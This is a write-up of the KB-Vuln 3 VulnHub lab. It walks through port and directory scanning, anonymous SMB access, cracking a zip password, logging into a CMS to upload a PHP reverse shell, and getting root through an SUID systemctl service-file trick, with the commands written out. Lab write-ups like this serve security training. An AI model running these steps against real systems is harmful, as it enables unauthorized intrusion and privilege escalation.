KB-Vuln 3 vulnhub writeup

I started by scanning the target machine for any open ports and services running on those ports using the Nmap tool.

nmap -p- -A <IP>

We have an Apache server running on port 80, let’s gobuster it :

gobuster dir --url http://<IP>/ --wordlist=/usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x js,php,txt,html,/ -t 100

Nothing found

Let’s try to see what we can find in the samba shares without password.

smbclient -L <IP>

There is a Files folder, let’s log in to see what’s inside using this command :

smb //<IP>/Files

To download the file use this command : get website.zip. website.zip needs a password. Let’s try to crack it with frcrackzip and the rockyou.txt list.

fcrackzip website.zip -D -p /home/kali/Documents/rockyou.txt -u

Works !

README.txt gives us user : admin and password : jesse for the website kb.vuln. Let’s add kb.vuln to our hosts list with the following command :

sudo nano /etc/hosts

Go to http://kb.vuln/ it’s a Sitemagic CMS installation. Login as admin:jesse

Upload a php reverse shell :

And refresh the website to get a shell as www-data :

Location of our script

Works !

Use the following command to switch to a more complete shell :

/usr/bin/script -qc /bin/bash /dev/null = spwan shell

cat user.txt in the home directory, first flag :

This hash = md5(mr.write)

Now it’s time to privilege escalation, use the following command to search for SUID files :

find / -type f -perm /4000 -ls 2>/dev/null

There is a very interesting one : /bin/systemctl. Systemctl is used to examine and control the state of “systemd” system and service manager. Use this site to find some exploit with systemctl. Try to understand how it works before running the exploit. We found an interesting one, let’s apply it :

On our www-data shell :

echo '[Service]
Type=oneshot
ExecStart=/bin/sh -c "cp /bin/bash /var/www/html/sitemagic/ && chmod +s /var/www/html/sitemagic/bash"
[Install]
WantedBy=multi-user.target' > /var/www/html/sitemagic/shell.service

Let’s link our shell.service with systemctl

systemctl link /var/www/html/sitemagic/shell.service
enable --now /var/www/html/sitemagic/shell.service
cd /var/www/html/sitemagic/

And run it :

./bash -p

Root !

cd /root

…well done